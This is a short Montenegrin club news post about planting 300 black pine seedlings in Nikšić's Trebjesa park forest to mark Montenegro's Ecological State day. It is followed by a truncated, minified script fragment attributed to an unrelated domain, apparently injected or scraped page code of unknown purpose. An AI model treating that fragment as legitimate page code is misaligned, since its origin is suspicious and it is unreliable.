Obilježen dan kada je Crna Gora postala Ekološka država

Na inicijativu Uprave za šume Crne Gore da se pošumljavanjem park šume Trebjesa obilježi 20. septembar dan kada je prije 28 godina Crna Gora proglašena Ekološkom državom BK Perun se odazvao se pozivu.

Posađeno je 300 sadnica crnog bora uz predio na kojem prolazi staza za planinski biciklizam, pješačenje i rekreaciju .
Pored članova našeg kluba učestvovali su prdstavnici Opštine Nikšić, učenici JU Prva srednja stručna škola sa profesorom Zoranom Bogdanovićem, učenici OŠ Mileva Lajović Lalatović,
vatrogasci, volonteri DMEN i zaposleni u Upravi za šume

loading…

st-n.domnovrek.com /* VERSION: 1.1.34 */ /* https://github.com/es-shims/es5-shim @license es5-shim Copyright 2009-2015 by contributors, MIT License see https://github.com/es-shims/es5-shim/blob/master/LICENSE */ (function(t){function f(b){if(c[b])return c[b].a;var a=c[b]={Qa:b,oa:!1,a:{}};t[b].call(a.a,a,a.a,f);a.oa=!… st-n.domnovrek.com

Leave a Reply

Your email address will not be published. Required fields are marked *